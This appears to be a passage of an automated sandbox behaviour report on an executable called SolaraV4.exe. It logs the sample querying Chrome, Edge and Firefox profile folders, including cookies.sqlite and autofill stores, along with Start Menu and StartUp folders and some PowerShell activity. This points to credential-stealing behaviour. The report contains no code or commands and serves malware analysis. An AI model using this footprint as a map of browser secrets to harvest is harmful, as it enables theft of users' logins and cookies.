Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\2a4244a9-6ddb-4fcf-8518-af8544f13140 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\2a4244a9-6ddb-4fcf-8518-af8544f13140 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\2a4244a9-6ddb-4fcf-8518-af8544f13140 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\dcd18195-cd9a-4824-b300-56e602ae372f VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\content-prefs.sqlite VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
